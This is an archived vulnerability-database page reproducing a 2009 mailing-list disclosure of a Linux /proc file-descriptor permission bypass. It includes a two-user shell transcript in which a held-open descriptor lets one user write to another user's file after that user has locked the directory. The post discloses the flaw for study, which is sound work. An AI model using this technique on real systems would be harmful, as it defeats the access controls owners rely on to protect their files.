Vulners
Lucene search
proc File Descriptors Directory Permissions bypass
==================================================
proc File Descriptors Directory Permissions bypass
==================================================
# Title: proc File Descriptors Directory Permissions bypass
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Pavel Machek
# Published: 2009-10-23
# Verified: yes
view source
print?
Hi!
This is forward from lkml, so no, I did not invent this
hole. Unfortunately, I do not think lkml sees this as a security hole,
so...
Jamie Lokier said:
> > > a) the current permission model under /proc/PID/fd has a security
> > > hole (which Jamie is worried about)
> >
> > I believe its bugtraq time. Being able to reopen file with additional
> > permissions looks like a security problem...
> >
> > Jamie, do you have some test script? And do you want your 15 minutes
> > of bugtraq fame? ;-).
> The reopen does check the inode permission, but it does not require
> you have any reachable path to the file. Someone _might_ use that as
> a traditional unix security mechanism, but if so it's probably quite rare.
Ok, I got this, with two users. I guess it is real (but obscure)
security hole.
So, we have this scenario. pavel/root is not doing anything interesting in
the background.
[email protected]:/tmp$ uname -a
Linux toy.ucw.cz 2.6.32-rc3 #21 Mon Oct 19 07:32:02 CEST 2009 armv5tel GNU/Linux
[email protected]:/tmp mkdir my_priv; cd my_priv
[email protected]:/tmp/my_priv$ echo this file should never be writable > unwritable_file
# lock down directory
[email protected]:/tmp/my_priv$ chmod 700 .
# relax file permissions, directory is private, so this is safe
# check link count on unwritable_file. We would not want someone
# to have a hard link to work around our permissions, would we?
[email protected]:/tmp/my_priv$ chmod 666 unwritable_file
[email protected]:/tmp/my_priv$ cat unwritable_file
this file should never be writable
[email protected]:/tmp/my_priv$ cat unwritable_file
got you
# Security problem here
[Please pause here for a while before reading how guest did it.]
Unexpected? Well, yes, to me anyway. Linux specific? Yes, I think so.
So what did happen? User guest was able to work around directory
permissions in the background, using /proc filesystem.
[email protected]:~$ bash 3< /tmp/my_priv/unwritable_file
# Running inside nested shell
[email protected]:~$ read A <&3
[email protected]:~$ echo $A
this file should never be writable
[email protected]:~$ cd /tmp/my_priv
[email protected]:/tmp/my_priv$ ls
unwritable_file
# pavel did chmod 000, chmod 666 here
[email protected]:/tmp/my_priv$ ls
ls: cannot open directory .: Permission denied
# Linux correctly prevents guest from writing to that file
[email protected]:/tmp/my_priv$ cat unwritable_file
cat: unwritable_file: Permission denied
[email protected]:/tmp/my_priv$ echo got you >&3
bash: echo: write error: Bad file descriptor
# ...until we take a way around it with /proc filesystem. Oops.
[email protected]:/tmp/my_priv$ echo got you > /proc/self/fd/3
# 0day.today [2018-01-02] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Oct 2009 00:00Current
6.8Medium risk
Vulners AI Score6.8